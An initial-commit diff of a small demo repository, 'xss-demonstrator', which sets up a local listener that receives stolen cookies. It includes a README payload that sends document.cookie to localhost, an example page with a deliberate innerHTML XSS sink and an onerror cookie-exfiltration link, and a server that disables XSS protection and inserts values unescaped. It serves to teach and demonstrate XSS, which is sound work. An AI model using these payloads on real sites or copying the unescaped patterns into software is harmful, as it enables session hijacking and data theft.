Initial commit

.gitignore

@@ -0,0 +1,121 @@
+### https://raw.github.com/github/gitignore/4bff4a2986af526650f1d329d97047dc1fa87599/Node.gitignore
+
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+
+# Runtime data
+pids
+*.pid
+*.seed
+*.pid.lock
+
+# Directory for instrumented libs generated by jscoverage/JSCover
+lib-cov
+
+# Coverage directory used by tools like istanbul
+coverage
+
+# nyc test coverage
+.nyc_output
+
+# Grunt intermediate storage (http:https://gruntjs.com/creating-plugins#storing-task-files)
+.grunt
+
+# Bower dependency directory (https://bower.io/)
+bower_components
+
+# node-waf configuration
+.lock-wscript
+
+# Compiled binary addons (https://nodejs.org/api/addons.html)
+build/Release
+
+# Dependency directories
+node_modules/
+jspm_packages/
+
+# Typescript v1 declaration files
+typings/
+
+# Optional npm cache directory
+.npm
+
+# Optional eslint cache
+.eslintcache
+
+# Optional REPL history
+.node_repl_history
+
+# Output of 'npm pack'
+*.tgz
+
+# Yarn Integrity file
+.yarn-integrity
+
+# dotenv environment variables file
+.env
+
+# next.js build output
+.next
+
+
+### https://raw.github.com/github/gitignore/4bff4a2986af526650f1d329d97047dc1fa87599/Global/macOS.gitignore
+
+# General
+.DS_Store
+.AppleDouble
+.LSOverride
+
+# Icon must end with two \r
+Icon
+
+# Thumbnails
+._*
+
+# Files that might appear in the root of a volume
+.DocumentRevisions-V100
+.fseventsd
+.Spotlight-V100
+.TemporaryItems
+.Trashes
+.VolumeIcon.icns
+.com.apple.timemachine.donotpresent
+
+# Directories potentially created on remote AFP share
+.AppleDB
+.AppleDesktop
+Network Trash Folder
+Temporary Items
+.apdisk
+
+
+### https://raw.github.com/github/gitignore/4bff4a2986af526650f1d329d97047dc1fa87599/Global/Windows.gitignore
+
+# Windows thumbnail cache files
+Thumbs.db
+ehthumbs.db
+ehthumbs_vista.db
+
+# Dump file
+*.stackdump
+
+# Folder config file
+[Dd]esktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Windows shortcuts
+*.lnk
+
+

LICENSE.md

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2018 nolze
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,52 @@
+# xss-demonstrator
+
+A simple interactive listener for demonstrating XSS attacks.
+
+![screen capture](assets/screen.gif)
+
+## Usage
+
+1\. Start demonstrator 
+
+```
+npm start
+```
+
+2\. Execute an XSS payload on the victim webpage
+
+```js
+window.location = "http:https://localhost:8080/?" + document.cookie
+```
+
+3\. The webpage is opened with the stolen cookies in demonstrator
+
+## Example
+
+1\. Start demonstrator
+
+```
+npm start
+```
+
+2\. Start the example server
+
+```
+cd example
+node server.js
+```
+
+3\. Open <http:https://localhost:8000/>
+
+## Todo
+
+* [ ] Add config feature
+* [ ] Complete packaging
+* [ ] Add tunneling proxy feature
+* [ ] Add more information gathering features
+* [ ] Add tests
+* [ ] Add icon
+* [ ] Add auto update
+
+## See also
+
+* BeEF <http:https://beefproject.com/> (for advanced purposes)

example/index.html

@@ -0,0 +1,32 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<title>Example</title>
+</head>
+<body>
+<div>
+<a href="/?msg=<img src=x onerror=&#34;document.head.innerHTML=`<link rel=stylesheet href='//localhost:8080/?`+document.cookie+`'>`&#34;>">Load an XSS payload on this page</a>
+</div>
+<p>
+Username: <input id="field" type="text" value="%NAME%" /><input id="login" type="submit" value="Log in">
+</p>
+<h1>Welcome, %NAME%</h1>
+<textarea id="text" style="width:300px;height:200px;">
+</textarea>
+<input id="preview" type="submit" value="Preview">
+<p>Message: <span id="msg"></span></p>
+<script>
+document.getElementById("login").addEventListener("click", function(ev) {
+ document.cookie = "username=" + document.getElementById("field").value
+ location.reload()
+})
+document.getElementById("preview").addEventListener("click", function(ev) {
+ location.href = "/?msg=" + document.getElementById("text").value
+})
+var msg = decodeURI(location.search.replace(/^\?msg=/, ""))
+document.getElementById("text").value = msg
+document.getElementById("msg").innerHTML = msg
+</script>
+</body>
+</html>

example/server.js

@@ -0,0 +1,32 @@
+const http = require('http')
+
+const fs = require('fs')
+const path = require('path')
+const url = require('url')
+
+const PORT = 8000
+const HOSTNAME = 'localhost'
+
+function cookieVal(cookie, key){
+ return ((cookie + ';').match(key + '=([^;]*)')||[])[1]
+}
+
+http.createServer(function (req, res) {
+ let cookie
+ console.log(req.headers.cookie, req.headers)
+ if (req.headers.cookie === undefined) {
+ cookie = "username=Admin"
+ } else {
+ cookie = req.headers.cookie
+ }
+ console.log(cookieVal(cookie, "username"))
+ fs.readFile('index.html', 'utf8', function (err, data) {
+ res.writeHead(200, {
+ 'Content-Type': 'text/html',
+ 'X-XSS-Protection': '0',
+ 'Set-Cookie': cookie
+ })
+ // console.log(data, cookieVal(cookie, "username"))
+ res.end(data.replace(/%NAME%/g, cookieVal(cookie, "username")), 'utf-8')
+ })
+}).listen(PORT, HOSTNAME)